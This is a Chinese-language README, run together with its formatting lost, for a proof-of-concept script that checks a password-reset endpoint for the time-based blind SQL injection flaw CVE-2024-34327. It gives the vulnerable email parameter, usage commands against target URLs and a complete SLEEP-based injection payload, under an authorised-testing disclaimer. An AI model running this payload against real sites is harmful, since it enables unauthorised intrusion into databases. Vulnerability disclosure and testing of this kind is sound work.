本脚本(V-24-02-001_SQLi_Check.py)是一个概念验证(PoC)工具,用于验证CVE-2024-34327所标识的、影响password-reset-token.php端点的基于时间的盲SQL注入漏洞。
本工具仅供教育和授权测试目的使用。未经同意擅自扫描或利用系统是非法且不道德的。
/auth/password-reset-token.phpemail参数SLEEP()函数测量服务器响应的延迟PHPSESSID cookie值requests 库(pip install requests)python3 V-24-02-001_SQLi_Check.py --url https://target-domain.com
python3 V-24-02-001_SQLi_Check.py --url https://vulnerable-site.com
[+] VULNERABLE 如果服务器响应延迟超过9秒[-] NOT VULNERABLE 否则data[email][email protected]'+AND+(SELECT+8161+FROM+(SELECT(SLEEP(10)))uvHC)+AND+'abcd'='abcd
requests库User-Agent和Referer您有责任以符合道德的方式使用此工具。作者对任何滥用行为不承担任何责任。
安全研究员 – [您的姓名或别名]
欢迎贡献或报告问题。